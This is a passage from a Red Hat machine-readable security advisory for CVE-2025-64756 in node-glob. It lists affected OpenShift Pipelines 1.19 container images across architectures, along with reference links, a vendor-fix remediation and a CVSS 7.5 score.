"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-64756"
},
{
"category": "external",
"summary": "RHBZ#2415451",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2415451"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-64756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64756"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146",
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2",
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
}
],
"release_date": "2025-11-17T17:29:08.029000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
